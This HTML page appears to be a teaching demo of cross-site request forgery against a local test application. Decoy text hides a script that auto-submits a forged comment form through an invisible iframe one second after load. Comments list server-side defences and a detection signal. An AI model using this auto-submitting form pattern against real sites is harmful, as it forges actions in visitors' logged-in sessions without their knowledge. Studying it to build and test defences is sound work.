<!doctype html>
<html>
	<head>
		<meta charset="utf-8"/>
		<title>csrf demo</title>
		<!--
			Teaching demo of cross-site request forgery (CSRF) against a test
			application on localhost:1521. The page shows harmless text while its
			script submits a comment form to that application with no user action.

			What the receiving application should do (its code is not part of this
			page, so whether it already does any of this is unknown):
			  * require an unpredictable per-session anti-CSRF token on every
			    state-changing request and reject requests that lack it;
			  * set session cookies with SameSite=Lax or SameSite=Strict so they
			    are not attached to cross-site POSTs;
			  * check the Origin (or Referer) header on POST and reject values
			    that are not the application's own origin.
			For detection, a POST to /post/addComment whose Origin or Referer is a
			foreign site is the signal to look for in the application's logs.
		-->
	</head>
	<body>
		<!-- Decoy text shown to the visitor; it reads "hello, there is nothing here." -->
		hello，这里什么也没有。
		<script>
			// Step 1: emit the forged form while the document is still being parsed.
			// The form posts to the comment endpoint of the test application with a
			// fixed postId and fixed comment text, and names the frame "csrf" as its
			// target. It carries no anti-CSRF token field, so the request only
			// succeeds if the server does not require one.
			document.write(`
				<form name="commentForm" target="csrf" method="post" action="http://localhost:1521/post/addComment">
					<input name="postId" type="hidden" value="1">
					<textarea name="content">来自CSRF！</textarea>
				</form>`
			);

			// Step 2: create an invisible iframe whose name matches the form's target,
			// so the response loads inside it and the visible page does not navigate.
			var iframe = document.createElement('iframe');
			iframe.name = 'csrf';
			iframe.style.display = 'none';
			document.body.appendChild(iframe);

			// Step 3: submit the form one second after the script runs, with no click
			// from the visitor. Whether the browser attaches the visitor's session
			// cookie for localhost:1521 depends on that cookie's SameSite attribute,
			// which is why SameSite is listed among the server-side defences above.
			setTimeout(function(){
				document.querySelector('[name=commentForm]').submit();
			},1000);
		</script>
	</body>
</html>
